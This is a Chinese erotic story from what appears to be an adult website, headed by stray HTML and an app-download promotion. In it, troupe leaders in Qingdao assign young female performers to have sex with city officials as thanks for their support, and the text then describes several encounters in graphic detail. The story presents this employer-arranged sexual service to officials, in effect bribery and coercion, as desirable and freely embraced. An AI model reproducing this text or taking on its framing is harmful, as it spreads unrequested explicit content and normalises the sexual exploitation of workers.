<td id="loli0"><ruby id="loli0"></ruby></td>
    1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>

      以下APP站长已检测强烈推荐下载(狼友必备)

      歌舞团秘史

        歌舞團秘史
      海鳥歌舞團的前身是:山東省青島市歌舞團,它隸屬青島市文化局。由于改革開放的春風,吹遍中國大地,當然市歌舞團也不例外,為了能到外地甚至到國外進行演出,經市文化局批準,市歌舞團正式改名為海鳥歌舞團。

      在掛牌的這一天,歌舞團大肆慶祝,還請了市領導前來剪彩,到場祝賀的領導有:市政府趙秘書長,市紀委齊主任,市文化局王局長,文化局宣傳處的韓處長,市群藝館吳館長以及歌舞團的業務關系單位:市人民銀行的馬行長,市演出公司的馮經理,市大劇院的丁經理……

      歌舞團在市里最大的五星級酒店——青島大酒店設宴慶祝,在酒店的中餐廳里,一片猜拳行令,好不熱鬧,團里還專門抽調了能喝酒的職工在做陪。酒店的服務員來往穿梭,斟酒夾菜,大廳里的喧嘩聲,碰杯聲,大笑聲,低語聲,不絕于耳……

      而在這里的人,都是團里請來的普通客人,而那些有頭有臉的重要人物,卻一個也沒有?因為他們都在團里給安排的高級雅間兒里,歌舞團的白團長和侯副團長,由團辦公室湯主任領著,到各個雅間兒前去給領導們敬酒,見面自然是一陣寒暄,多多支持,表示感謝的話……

      哎……哎……請大家靜一靜,白團長邊說邊叫湯主任你去把東西拿來。

      好……好……我這就去……

      各位領導,待一會兒,飯后我們團為了對領導們,表示感謝,特意安排了休閑節目,希望您們玩的開心……

      正說著,湯主任抱著幾本像冊推門進來了。

      團長,東西我拿來了。

      好,把東西發給大家……

      好,來……來……哎……好了……您的……

      哦……您的……哎……得……您的最后一本兒……得。

      團長,都發完了,好……

      哎……我說,老白,你這搞的是什么鬼?

      哎……您別著急,聽我說:各位打開像冊……

      哎……怎么……都是些漂亮的女孩兒?

      這是我們歌舞團的演員,您們每人挑一個,我們在酒店訂了客房,飯后讓姑娘們去陪各位……照片下面有她們的年齡,身高,三圍和從事的工作,有歌唱演員,舞蹈演員和節目主持人……

      好……好……太好了,一片歡呼聲,接著是一片低聲議論……

      這些平時道貌黯然的領導們,都被照片上青春靚麗的女孩所吸引,有的已想入非非,想著待會兒就要和姑娘們做愛的情景……好了嗎?大家都選好了嗎?

      好了……

      湯主任你記一下,可別弄錯了啊……

      團長,您就放心吧,保證錯不了……來,來來。都讓我記一下:好……您的……好,這是您的……哎,您的……好了。

      團長,我都記好了,那行,你先去安排一下,要快啊……

      好的……我馬上就去,各位領導,您們先吃著,我去安排一下……

      湯主任走出酒店,坐上團里的別克轎車,向位于青島市海港區,青年大街277號的歌舞團駛去……

      車子一進團里,湯主任就吩咐司機去開那輛中巴,自己則去找姑娘們。

      很快,中巴車就停到大會議室門口,里面十幾個女孩已到齊。有:梁萌,夏莎,孔小冰,孫歡,朱月月……等……

      好啦,姑娘們聽著,今天你們陪的是很重要的領導,你們一定要使出渾身解術,把領導伺候舒服了……記住了嗎?

      記住了……

      好,我們出發。


      車子一路開到酒店,這時領導們,已到位于酒店七樓的客房等候。

      702房間住的是趙秘書長,叮咚……叮咚……

      來,來,來——請進,門一開走進一位身材苗條的女孩,她就是趙秘書長選的節目主持人——梁萌。

      來……坐到我身邊來

      好的……姑娘嬌聲答道。

      來到他對面的沙發上坐了下來。

      你叫梁萌是嗎?

      是的!

      你多大了?

      21歲

      哦……那你看我有多大?

      小萌擡頭看著對面的男人,戴一副窄邊樹脂眼鏡,小平頭,身材削瘦,穿一套深色西裝,打暗紅色領帶,腳穿黑色皮鞋,有一種精明,干練的氣質。

      姑娘漸漸對這個中年男人有一種好感。

      您今年有40歲……

      好,差不多!

      我39歲……你還真會看。

      小萌,你站起來,讓我好好看看……

      小萌輕輕地站了起來,這時他才仔細的打量這位姑娘:見她,身高大約1米70,長長的瀑布似的黑發,長著一雙丹鳳眼,小小的瓊鼻,性感的嘴唇,上身穿一件淺色寬松薄毛衣,下身穿一條橘紅色半長筒裙,沒穿襪子,露出一截白晰的小腿兒,腳穿一雙白色軟皮平底兒鞋,顯的很有朝氣,見她落落大方,容貌氣質俱佳,嬌羞中還帶有嫵媚……

      真是個好美人兒,好了,請坐下吧!你會喝酒嗎?

      嗯……只能喝一點點。

      好,咱們來喝一杯!

      我去倒,姑娘乖乖地在冰箱里拿了一瓶紅酒,每人倒了一杯,很溫柔地坐到他的身邊,來好哥哥,讓小妹敬你。

      好,我的好妹妹。

      幾杯酒下肚,姑娘小臉兒紅樸樸的煞是好看,一雙迷人的媚眼調逗似地看著讓她心神不寧的男人。那意思好像是說:好哥哥你還楞著干嘛呀,快來抱抱妹妹嗎!

      而他也覺出女孩的意思了……

      正所謂酒為色之媒,他握住她的纖纖嫩手,深情地癡視著她,小萌媚眼中也閃射渴望的神情,這種眼神,更令他迷醉,是可以將他溶化的。

      他胸中欲火一股股涌上來,而在她火辣辣的注視下,越燒越烈……

      他一下子緊緊抱住她,熱烈擁吻她,姑娘也伸出又滑又嫩的香舌迎合著他,還挑逗地向他口中傳送著少女的香香的唾液,吻得兩人滿臉口水,氣喘噓噓。一切是那麼自然,那麼熱烈,那麼的甜蜜得令人陶醉。

      嗯……抱緊……我……她手指指向里面的房間,他大喜過望,兩臂用力抱起她,走到房間里,放到床上。小萌用力一拉,他腳步沒站穩,兩人同時滾倒在床上,擁作一團,他們像兩團火,彼此燃燒著……

      他瘋狂地吻著她,你不要急嗎!她嬌滴滴地說。先幫我把衣服脫下來……

      他脫下姑娘的毛衣外套,啊……啊……見她里面沒戴乳罩,只穿了一件白色黃邊的小背心,背心下擺還繡著一只小白兔兒,真是小女孩。

      這時,他才發現小萌被寬松毛衣掩蓋住的一對豐滿的乳房,又大又圓,兩個大大的乳頭頂在半透明的小背心上,嫣紅的兩粒乳頭硬硬地向前堅挺,深紅色的乳暈圓而均勻,襯托得兩粒乳尖更加誘人。

      一條纖纖細腰將全身都顯得窈窕,幼窄得盈指可握,再向下褪下她的裙子,裸露出白色暗花小內褲,包在小饅頭似的陰部,黑黑的陰毛有的不老實地鉆了出來,其它的都一致地將尖端齊齊指向大腿中間的小縫,在在小縫中偏又露出兩片紅紅皺皺的嫩皮,但卻是一小部份,讓人想到它僅僅是冰山一角,幻想著剩下的部位藏在里面會是怎樣,更聯想到那夾在兩片鮮艷的陰唇中間的桃源小洞會是如何迷人。

      雪一樣白的大腿不胖不瘦,光滑的小腿細膩有彈性,小萌調皮地用腳脫下小皮鞋,露出兩只美麗潔白的小腳丫兒,他深深地吸了口氣,太美了。

      好哥哥,幫妹妹脫下內褲。

      隨著內褲褪下,小萌壞壞地一轉身趴在床上,露出兩瓣兒雪白耀眼的肥臀。

      好妹妹,你別折磨我了,讓我看看你的小逼?

      小萌一反身靠到被子上,弓起雙腿露出了女孩神秘的下體,肥嫩的大陰唇成暗紅色,中間一條肉縫兒,柔軟的陰毛整齊排列著,黑,紅,白十分好看。已有陣陣甘露由小縫流出。

      他自覺胯下的小弟弟蠢蠢欲動,這時她已經伸出雙手來解他的皮帶,口中嬌羞地說:把褲子脫下來吧!說著已經把皮帶解開,順手拉下來,揪著褲字往下褪。

      她見面前豎著兩條肌肉結實的大腿。夾在中間的是一條白色的叁角內褲,而他的陰莖將叁角褲撐得鼓漲,像座小山。小萌看在眼里,呼吸也停頓了,情不自禁地低下頭去,伸出滑嫩的香舌,在上面輕輕地舔,一下一下津津有味,直把那陰莖舔得堅硬無比,像隨時會把內褲撐得爆裂開來。

      她的唾沫粘遍了整個內褲,已變成半透明,可清楚看到一根粗而壯的雞巴紅得發紫,龜頭的色澤比陰莖更深,由于無法伸展,已向腰間斜斜地直挺過去。包著兩顆睪丸的陰囊像熟透了的荔枝般又圓又紅,也被壓迫得快要在腿縫兩邊擠出來。

      她再也忍不住,雙手拉著叁角褲使勁往下一拉,一條碩大的陰莖跳了出來。

      她一手握著陰莖就忙往嘴里塞,另只細長的玉手托住陰囊,把著兩顆睪丸不停地玩弄。

      哦……好舒服呀……好溫暖呀!她的速度越來越快了。于是他站起身,抓住她的頭發狠狠地抽插了起來。

      她似乎有一些受不了了,不停地哦……哦……哦……地叫了起來。

      他把大雞吧從她的嘴里拿了出來,雙手不停地在姑娘身上撫摸著,小萌早已春情蕩漾,欲潮泛濫。她微睜媚眼,嘴角含春,由他撫摸輕薄,在他盡情的挑逗下,她欲念更旺,更熾,嬌軀顫動,像蛇一樣扭動,全身細胞都在跳耀震顫。

      她熱情如火地伸張兩臂緊摟著他,一手抓著熾硬如火的雞巴伸向早已泛濫的小穴,他用龜頭在陰道口撩了一圈,淫水已經多到流到陰囊那里,再運用腰力往上一頂,連根末入,小萌也順式輕擺柳腰,將大陰唇早已張開的小穴迎上去……

      啊……啊……啊啊……哦……哦哦哦……啊……啊啊……好哥哥你真好……

      他托住她的肥臀,把陰莖一下一下地在濕滑的陰道里頻頻抽插,龜頭傳來的難言快感,她也跟隨著節拍,用陰戶一吞一吐,大量的粘液順著兩人的大腿流了下來。

      ……啊……啊啊……美死我了……壞哥哥……

      一邊抽插,兩人一邊都低頭欣賞著春色無邊的場面,只見一條大陰莖在她鮮艷欲滴的兩片小陰唇中間出出入入,把一股又一股流出的淫水給帶得飛濺四散。

      她整個陰部由于充血而變得通紅,小陰唇緊緊地夾著青筋畢露的陰莖,陰蒂早已充血變硬,但經反復揉磨,使它越來越漲,越來越硬,變得像花生米大小。

      啊……啊……我的小親親……愛哥哥……啊……啊……你真會弄……啊……啊……我的小逼舒服極了……啊……啊……我要泄了……嗯……嗯……啊啊…啊啊……啊啊……啊……

      聽到她的淫詞浪語他更加興奮了。加快了速度,突然他感覺腰間一陣發麻,啊……滾燙的精液射入了她的子宮里。

      而她還在不斷地擺動著腰部,下體一聳一聳地高低套弄著,小臉兒紅紅的,仰得高高的,微張著性感小嘴,香尖在唇上撩舔著,雙手捧著大大的嫩乳又搓又磨,一頭烏黑的秀發也隨著左右甩著。

      啊……啊啊哦……突然小萌一陣長叫……

      我完了啊……一大股陰精狂泄出來,也達到了高潮……

      暴風雨過后,兩人相擁而眠。

      住在酒店703室的是市紀委的齊主任。老齊今年整50歲,在紀委干了30年了,他為人還算正直,對歌舞團這樣的安排不太滿意。但看到這么年輕、漂亮、性感的女孩也禁不住浮想連篇,都是人嘛!都有性的沖動。

      他叫的女孩,是團里的舞蹈演員孔小冰,但是他卻沒有這艷福,小冰剛到他的房間,連看都沒看上一眼,突然:零……零……零……

      他的手機響個不停,喂,哪位?

      哦……是齊主任嗎?

      哦……是我,你是?

      我是辦公室小蘇??!

      哦……你有是事嗎?

      哦……是這樣,主任您快回來一下吧!曹書記有急事要見您。

      好……好……好……我馬上回去……

      哦……小同志,對不起,我有事要先走,你呆在這,我一會兒讓司機送你回家……啊……

      小冰聽話地點點頭,在回紀委的路上,他吩咐司機陳軍,呆會兒把女孩送回家。

      您放心吧!齊叔。這個陳軍是老齊戰友的兒子,部隊剛復員,是才分配到紀委開車的。

      很快奧迪載著老齊回到單位。

      你就別上樓了,把姑娘送回去……啊……注意安全。

      好的,陳軍邊答應邊轉動方向盤,向酒店駛去……

      在說孔小冰,一個人在房間看電視,這時有人推門進來了,她還以為是那位領導又回來了。

      馬上站起來去迎接,在門口正好碰到剛進屋的陳軍,兩人看到對方都驚呆了……

      小冰長到這么大,從沒見過這么帥的小伙兒,按說歌舞團里的帥男孩很多,但都比不上眼前的小伙兒,只見他1米83左右的身高,寬寬的肩膀,鍵壯的體格,留短發,濃眉毛,大眼睛,微微有點兒胡子茬,更顯男人的魅力,穿一身黑色西裝,黑色襯衫,沒打領帶,腳穿一雙很亮的系帶兒皮鞋。

      少女被他獨有的灑脫和英俊所吸引,小伙有神的眼睛,看的她心中小鹿兒蹦蹦亂跳,她終于知道什么是人們常說的:一見鐘情。

      陳軍也被這個歌舞團的女孩吸引,見她:滿頭的黑發沒散著,梳了兩條小辮子,很象瓊瑤電視劇的少女,大大的眼睛,雙眼皮兒,小巧的玉鼻向上翹著,肉嘟嘟的紅唇,臉蛋兒白靜,細膩,一個黑點兒都沒有,身高1。67米左右,上身穿黑色半大風衣,下身著一條深紅色黑格的呢子短裙,腳穿黑色短靴,服裝的搭配很合協。

      哦……你叫?

      ……哦……孔小冰。

      那你是?

      我是紀委的司機叫陳軍……

      我現在就送你回家!

      哦……好吧!

      你家???……

      我不是青島人,我是杭州人……在這和別人同租的房子……

      我給你領路……很快車子停在明暢園小區12號樓下……

      我住在301室,謝謝你送我,到我家呆會兒好嗎?

      好……好……兩人鎖好車一起上樓……

      你的同伴兒在嗎?

      哦……她叫夏莎還在酒店陪領導……說著姑娘羞紅了臉!

      女孩的屋是神秘的,他很好奇的走進這兩室一廳,客廳一排沙發,對面是21吋的海爾電視,客廳角有一個小冰箱,擺設很簡單……

      來……你喝水

      好,當他去接水杯時,碰到了姑娘白晰柔軟的玉手,兩人都有點不好意思……

      要不要參觀我的房間?她邊說邊脫掉風衣,見她里邊穿一件和短裙一樣顏色的緊身衣,它的乳房不太大但很挺,象兩座小山峰。見他目不轉睛地盯著她的胸部,小冰心中暗喜……如能和這么帥的男孩做愛那太好了。

      屋里是一張大雙人床,一個大衣柜,一個梳妝臺,床頭擺了個大玩具熊,衣架上掛了幾件小冰的內衣和乳罩。

      來坐在床上,你知道我們去酒店干什么嗎?小冰問他。

      不是陪領導喝酒嗎?

      才不是那,團里讓我們陪領導做愛……

      啊……真的!

      真的,沒騙你……別人都能完成團里安排的工作……可我沒完成……你說怎么辦呢?

      哦……我怎么幫你呢?

      我20歲你多大?

      哦……我22歲。

      那我應叫你哥哥……

      哦……好妹妹。

      要不我陪陪你好嗎?

      ……好妹妹真的嗎?

      嗯……說著女孩羞的低下了頭……

      看著漂亮的女孩他再也忍不住了。他將嘴湊到她的耳邊,悄悄對她說:好妹妹你真漂亮。

      她擡起頭,臉兒紅紅的,一縷柔發掠過他的臉。她用含笑的眼睛看著他說:謝謝哥,你也很帥我喜歡你……說著拉著他的手,他的心頭一陣發熱。伸出手來,大著膽子抓住了她的胳膊,頓時他感到一種柔軟和滑膩,他用另一只手撫摸她發燙的臉蛋兒,還能感受到她的體溫和體香,他幾乎呼吸不下去。而小冰用溫柔的大眼睛看著他,呈現一種令人心醉的羞樣。

      我真的可以嗎?他問。

      她嬌嬌地瞟他一眼,馬上又低頭垂目,然后輕輕點了一下頭。

      陳軍被她嬌羞的樣子調逗地興奮起來,把她攬入懷中,他的唇貪婪地搜索著她欲拒還迎的唇。男人的接吻方式,與他做愛一樣,積極而主動,起先小冰感到唇內一陣濕軟,然而陳軍張大她的唇,將他的舌頭整個地伸進她的口內翻騰、吸吮。兩人的津液合而為一,小冰被這樣的吻弄得酥麻而陶醉,她軟軟地倒在他的懷里,閉上了秀眼。

      他粗壯的手從她的頭臉移下去,輕輕撩起她的上衣,伸在她的乳罩下,撫摸兩只顫悠悠圓鼓鼓的嫩乳,雪白、柔嫩、結實。在他的不停揉捏下,小冰的腿間感覺已滲出些粘液,和他襠部硬熱硬熱的部位緊貼在一起,而他的手緩緩向下滑去,小冰心蕩神馳,體溫由于身體的接觸,一下子高漲起來。他們的呼吸急促,心跳如擊鼓一樣咚……咚……咚……毛孔由于發情,迅速地擴張著。

      兩個人在床上滾動著,他身體強壯,使勁擠壓著小冰,他輕咬著她,從頸肩到豐胸,每一個碰觸,都換來她的低喊。他摟著她,低頭輕吻著她的香唇,小冰雙唇微張,他把舌頭伸進去,在她的嘴里攪動,挑弄著她的舌頭。讓她把舌頭伸進自己嘴里,輕柔地吸吮著。手摟著她的細腰,漸漸地往上移動,順著她的曲線撫摸到她的胸部。

      她的喘息越來越粗重,她羞得擡不起頭來,低聲說:把人家的衣服脫下來嘛。邊說還邊伸出香舌添了他耳陲一下……

      得到了鼓勵,他馬上撩起了她上衣的下擺,她把身子靠向他,他開始為她寬衣,但越是著急,她的緊身衣越脫不下來,她只好自己動手,很快脫了下來,粉白的胸部裸露在他眼前。他正在目瞪口呆之際,她推了他一把,將溫潤如玉的后背轉向他:來,幫我一下。

      他幫她解開乳罩的扣子,乳罩一下子松開,他緊緊地將她抱住,兩只手伸到面,托住兩個沉甸甸的乳房。頓時,一種溫熱柔軟的感覺充滿了他的手掌。他愛不釋手地撫弄著兩個如白饅頭般溫暖的乳房,他將頭伸過去,用嘴含住一個嫣紅的乳頭,她的嘴中發出一陣呻吟:啊……啊……哦……哦……啊……

      他的手游移到她的大腿上:好妹妹,真沒想到你這么嫩,這么軟。她的大腿更張開了些,卻空出手來開始解他的衣服。

      他也順勢脫下了她的短裙,看見她兩條包裹在絲襪里的美腿,局促地交織在一起,下面是黑色的小皮靴,上面是白色的內褲,她伸手將小皮靴脫下來,他用手撫摸著她柔嫩的小腳兒,看著她兩只秀美的腳害羞地勾在一起。她先將絲襪慢慢褪了下來,兩條白潤修長的腿完全裸露了。

      小冰含情默默地看了他一眼,又低頭看了看自己的小內褲。他知道她要他幫她脫,他脫下了她內褲,她的陰毛呈三角形分部在肉丘上,陰唇狹窄,淫水充滿著穴口,好像要滴下來一樣,看她的陰部已是滑膩膩的一片。

      他調皮地看了她一眼,她的臉更紅了:都是你弄出來的,你壞……說完仰身躺倒在床上。他的手指抵在她的兩片陰唇之間,輕輕地撩逗著她。她的淫水漸漸多起來,他的手指感覺到她陰唇的曲線和飽滿的陰阜,另一手揉捏著她的乳頭,小冰輕輕地哼著:啊……啊……啊……啊……哦……

      來,把腳擡上來。陳軍讓小冰擡起右腳,趴到她的腿間。然后用手指分開的陰唇,露出淫水滿溢的穴口,在穴口上輕吻著,舌頭輕挑著她紅嫩的穴肉。

      啊……啊……啊……好哥哥你……你……真會舔……啊……好舒服……她浪浪地呻吟著。

      小冰顫抖著,兩手扶著他的頭。他在她的陰蒂、穴口和會陰三個部位輪流挑逗,企圖找出她最敏感的那一點,當發覺她的陰蒂十分敏感時,于是集中火力在陰蒂上,手指則在她的會陰部位滑動,小冰不停地扭動纖纖嫩腰,身體像支撐不住似地彎下來,她緊抓住他的頭發,用力將他拉向她的雙腿之間。

      啊……快點……要……要……快……啊……啊……好好……好壞的哥哥……

      快什么?你要什么?要說清楚呀!陳軍問她。

      快插進來……啊……啊……我要……快……快……操我吧……操我……

      他剛剛把衣服脫光,她便緊緊把他摟住,濕潤綿軟的香舌擠到他嘴里忘情地吻著,纖細的手指也抓住他已經脹到極點的陰莖,慢慢送入到她溫暖的小穴中。

      他架起她的胳膊,使勁一捅,陰莖一下子全根而入,他發出了一聲呻吟,她也長長吐出了一口氣。就這樣,他們靜止了許久,她只是溫柔地親著他的臉,他只是靜靜地插在她里面,感受著她里面的緊縮、蠕動與潤滑。他擡起頭,深情地凝視著她:好妹妹你真好,真浪。

      她的雙手捧住他的臉,柔聲說:壞哥哥,你動動啊……

      他開始瘋狂地抽插起來,她的呻吟也越來越重,聲音越來越大。小冰緊緊地摟住他的脖子,雪白的屁股慢慢地轉動,一圈一圈地扭著,陰莖緊緊地抵住她的陰道壁,火熱的龜頭在她的陰道壁上刮著,淫水一股股地流出來。

      小冰一面轉動一面發出甜美的呻吟:好爽啊……好哥哥……你舒服嗎……啊……啊……好爽……

      他雙手扶著她的腰肢,幫助她轉動,漸漸加快了速度,小冰改轉為挺,屁股一前一后地挺動,陰莖在她的穴內一進一出,發出一陣陣淫浪的肉聲。陳軍托住她的屁股,讓她上上下下地套弄,肉體磨擦帶來一陣陣快感,推動小冰到高潮的頂峰。

      啊……啊……我來了……高潮了……好爽……好……啊……啊……受不了……太好了……啊……要瀉了……

      小冰全身都浪起來,她緊抓著他的肩膀,豐滿的乳房上下跳動。她仰起頭,不顧一切地忘情嘶喊著,他緊緊的抓住她的臀肉,她不停地挺動,讓龜頭緊抵住子宮口,他感到她的陰道一陣緊縮,淫水像小河一般的流出,小冰猛得一陣顫抖,全身癱軟下來,緊抱著陳軍,不停地喘氣。

      而他把她的大腿向兩旁分開,猛力地抽動,陰莖吞吐的快感讓女孩產生連續不斷的高潮。她兩手撐持著床,緊閉雙眼,他的陰莖在她的穴內來回抽插,帶著她紅嫩的陰肉翻進翻出,小冰不停地扭動身體,不斷v 發出淫浪的呻吟,汗水混合著淫水,由她的腿間流到床上。

      噢……噢……啊……不行了……啊……你太強了……啊……啊……啊……啊……啊……

      隨著他身體幾乎凝固了,他的一股熱精終于噴射而出,小冰全身是汗,軟軟地倒在了他身上。陳軍低頭輕吻著她的秀發,輕咬著她的耳根,小冰不停地喘息著,她的氣息中帶著甜甜的香味,他順手抽了幾張面紙幫她擦拭身上的汗水和淫水。

      休息了一會,小冰睜開眼睛,媚眼如絲地看著既英俊又強壯的小伙兒,說:你真是太猛了!我已經好幾次高潮了耶!

      看看表,兩人玩了三個多小時。

      明暢園小區的這兩個俊男靚妹在激烈的性欲中根本不知道小冰的室友,團里的歌唱演員夏莎已回來了!而且在小冰虛掩的們縫中,看到了能讓任何正常男女,都心動的肉欲場面。

      為何夏莎回來的這么早?她陪的是市人民銀行的馬行長。馬行長在705房間,他是個老正統,一向反對這種事情,他同意讓莎莎陪的原因,一是:他多喝了點酒;二是:想看看偷情到底是何感覺。

      沒想到當他見到莎莎時,卻被她豐滿性感的身材所吸引。只見她:瀑布似的披肩長發,一身淺色套裙,肉色的絲織長襪,一雙乳白色的高跟皮鞋,雪白的肌膚,大的有些夸張的豐乳、肥臀。

      夏莎是來酒店的女孩中年齡最大的一個,今年25歲,她有一副好嗓子,擅長民歌,她已結婚一年了,老公是四川成都稅務局的,是他高中的同學,由于工作的原因,兩人一直兩地分居。

      看著眼前成熟透了的姑娘,他又想起家中的老伴,那胖胖的身材,滿臉的皺紋,哎……簡直沒法比。

      此時夏莎也看著這個有些發福的老人,年齡大約60歲。哎……自從上次回家和老公玩了幾次,一直到現在都半年了,她早就想了,自己手淫早已滿足不了她日益增漲的欲望,可是一直沒碰到她中意的男人,接到團領導的通知,她很高興,但沒想到安排她和一個老頭……但又不能拒絕,她來到老馬面前,對他說:我先陪您洗個澡。

      好……好……好……他很激動地回答!

      在房間的高級浴室,他躺到青瓷大浴缸里,水溫不涼不熱,感覺很舒服。莎莎赤裸著白嫩豐滿的玉體,跪在他兩腿間,用一雙纖纖細手,為他清洗軟軟的陰莖。

      她洗得很認真,很仔細,打上香皂洗完陰囊,洗陰莖,然后輕輕地清洗他的龜頭。

      很快他的陰莖漸漸漲大,她低頭一口含住龜頭,她的嘴里含著他的陰莖吸吮著,她慢慢地舔著他的陰莖上的龜頭,并用舌尖舔弄龜頭上的馬眼,接著用一只手不斷地輕揉著他的睪丸。

      啊……啊……他禁不住叫了出來,哦……哦……

      他從未被女人口交過,由其是這么漂亮,性感的姑娘,莎莎那小嘴因為他巨大的陰莖撐得難過,但她還是不停地抽出、含進地吸吮著陰莖。而他見姑娘用纖纖玉指握著自己的巨大陰莖,鮮紅小嘴還不停吸吮做著活塞運動。

      啊……啊……啊……

      他實在忍受不住了……濃濃的精液射進她的口中……

      哦……哦……哦……太舒服了。

      他滿足地對她說:姑娘,我很滿意,你可以回去了。

      好的,那您休息吧……

      她穿上衣服由馬行長的司機,把她送回家。一進家門就看到那屋內的一片春光??粗粗挥X夾住了雙腿,多么帥的小伙兒呀!小冰這死丫頭還真有福氣。我一定要把這小伙兒搞到手……一定……

      激烈的性愛后,兩人沉沉地睡去……

      一直到第二天,陳軍醒來后,身邊卻不見了小冰,他見梳妝臺上有她給留的條:好哥哥,我去團里,你今天不去上班,在家等我,中午我回來陪你吃飯。你的親親好妹妹冰兒。

      他笑了笑,起來去洗澡,啊……洗個熱水澡真舒服……他邊洗邊哼著歌……邊想著昨天和小冰做愛的情景,不知不覺中粗大的陰莖又硬了起來。

      他洗完澡穿著短褲,就走了出來,在客廳看電視……

      這時門開了,進來一位漂亮的姑娘,她就是夏莎。她今天特意早回來,就是為了他……

      陳軍也被這個姑娘所傾倒,你是……

      哦……我叫陳軍,是小冰的朋友。

      哦……我叫夏莎。

      哦……你就是夏莎,我聽小冰說過……小冰呢?她怎么沒回來?

      哦……她有事,晚回來一點。

      哦……是這樣??!

      陳軍仔細地打量著叫夏莎的姑娘:她穿了條膝上十五公分緊身短裙,露出了兩條白嫩誘人的美腿。半透明雪白薄紗襯衫第一顆扣子縫得頗低,露出胸口一大片雪白嬌嫩的肌膚與微露的乳溝,白色雕花蕾絲胸罩若隱若現。二十五六歲的年齡,成熟女性的迷人身材讓他看得口干舌燥,這是一個和小冰完全不同的姑娘。

      莎莎也坐在沙發上陪他聊天,每當她幫他倒水時,他就趁機眼睛俯視她的豐胸,窺見乳部上緣白嫩微聳的肌膚和誘人的乳溝,雖是窺見得不多,但已真是蕩人魂魄,讓陳軍下體一直興奮著。

      再向下看,雖然她雙膝合攏,但兩條雪白誘人美腿大半裸露在外,他幾乎可窺見大腿根部豐圓潤的肌膚,這誘惑實在太刺激了。

      莎莎見他滿臉通紅,不斷偷窺自己的大腿,本能地馬上夾緊雙腿,發覺已并攏,并未失態。她見自己兩條粉腿裸露大半,細滑光嫩,確是耀眼誘人。

      再往陳軍望去,這次兩人四目相接心意相通。

      莎莎見他紅著臉,又直楞楞地瞪著自己,又好笑又憐惜地說道:還沒看夠呀?

      陳軍恍然大悟,眼睛不自覺地落在莎莎白嫩胸部。

      莎莎被他火辣辣的眼神看的,深吸了一口氣,夾住了雙腿,他知她的春心已動。

      陳軍一邊和她聊天,一邊偷瞄她性感成熟身體,欲念狂漲,陰莖硬挺,但就是不敢動手侵犯。莎莎粉臉含羞,嬌嗔地說:你看你的傻樣兒,別光看那?

      陳軍望著她性感勻稱的身軀,再也忍不住,一把抱住姑娘的嬌軀,在她的耳根不停地磨梭,嗅著她頭發中散發出的誘人的香氣。她的頭發很長也很密,幾支發絲還不時鉆進他口中,在他的舌尖上纏繞,刮著他的神經,麻酥酥的感覺。

      他輕輕地撫弄著她的秀發。吻著她白皙的頸部。莎莎的眼睛緊緊地閉著,臉上似乎很平靜,但他壓在她頸上的唇能明顯地感覺到她的脈搏跳動得很快。她的雙手緊緊地抓住他的肩膀。

      他把手從她的發際挪到了她的雙肩,并順著她修長的手臂一直滑到了她的雙手。她的雙手很小巧,軟軟的。他用指尖輕輕地撓了撓她的手心,就見她睜開了雙眼,火一般的眼神盯著他,把他的心都快點燃了。

      陳軍饑渴地吸吮著莎莎柔軟的下唇,舌頭往她牙齒探去。她牙齒緊閉,一副堅壁清野的樣子,卻又任誘人的雙唇隨人吸吮。他將舌尖輕舔她的玉齒,兩人鼻息相聞。莎莎體會自己口唇正被一個丈夫以外的男人親昵地吸吮,覺得不妥卻又甘美難舍。

      他的舌尖已用力前探,撬開了姑娘的齒縫,舌頭長驅直入,攪弄她的嫩舌,莎莎雙唇被緊密壓著,香舌無力抗拒,只得任憑舔弄。他的舌頭先不住地纏攪她香甜香舌,然后猛然將莎莎嫩滑香舌吸到自己嘴里,輕咬細舐,又吸又吮姑娘的舌尖,莎莎只覺幾乎要暈眩,全身發熱。他將莎莎的香舌一吸一吐、一吐一吸,兩人舌頭交纏進出于雙方嘴里。

      莎莎欲火漸漸蕩漾開來,口里分泌出大量唾液,香舌情不自禁地伸入陳軍口中,任他吸吮,自己的唾液也渡了過去,又迫不急待地迎接他探入自己口中的濕潤舌頭。兩人頸項交纏地熱烈濕吻起來。

      陳軍右手往下探去,手滑進裙子里,隔著小小內褲,撫起莎莎圓翹的臀部,手指挑開內褲的蕾絲邊緣,摸著姑娘豐腴緊翹的屁股,觸感滑嫩彈性。手指再順著內褲的蕾絲邊緣內里,由后臀摸往前面,手掌往上捂住了她隆起的肥美陰阜。

      手掌接觸著柔細濃密的絨絨陰毛,中指往里摳去,但覺神秘柔嫩的細縫早已濕滑不堪。

      他的中指在迷人穴口輕撚輕插,莎莎沒想到他這么快就直搗自己圣潔私處,久未接受甘露滋潤的嫩穴傳來一波又一波強烈的酥骨酸癢,姑娘強壓已久的淫念強烈高漲,情不自禁地擡起頭來,大口喘氣,秀眉微簇,媚眼迷離,發出令人銷魂的嗯唔呻吟。然后嬌軟無力地癱軟在他的懷里,任憑他擺布。

      而他左手由莎莎的腰臀下滑,用手撩起窄裙后緣,手掌從內褲后頭繃帶處探入股溝,手指不時撫過菊花蕾周邊,并左右奔波揉抓莎莎渾圓豐滿的兩片屁股,并向淫水淋淋的肉縫摸索。右手仍捧住莎莎的肥美陰阜。靈巧的五指撫弄著陰唇嫩肉,淫水源源涌出,陰毛濕透泥濘……

      寂寞很久的成熟姑娘,那禁得住如此刺激折騰。紅紅的臉蛋依埋在陳軍的胸口,張口喘氣,香舌微露。下體陣陣顫抖,全身滾燙,挑起的欲火弄得全身嬌軟無力……

      見她冰清玉潔的嬌軀在自己雙手挑逗之下,婉轉呻吟,春情蕩漾更有種淫蕩的成就感。

      他俯下頭,添著莎莎的嫩滑香舌,她雙手勾住他的脖子,滾燙的臉伸出舌尖往上迎接,兩人舌尖在空中互相交舔數下,莎莎主動將香舌繞著他的舌尖撫舔一陣,然后再將他舌頭吞進小嘴,又吮又咂……

      他的雙手解開她的乳罩,蹦彈出一對顫巍巍白嫩碩乳。她的乳房很飽滿,像兩座小山堆在胸前,乳頭和乳暈都是暗紅色,乳頭因為充血硬硬的。

      好呀……你的比小冰大好多。

      你好討厭……

      他兩手各握住她一只乳房,大力揉搓起來,觸感柔嫩豐滿,食指姆指夾捏起大大微翹的乳頭,揉撚旋轉。

      莎莎乳房久未經人碰觸,何況又是這么帥的小伙兒。

      情不自禁地吐出一聲長長蕩人心弦的呻吟,啊……啊……啊啊……啊啊……啊……哦……

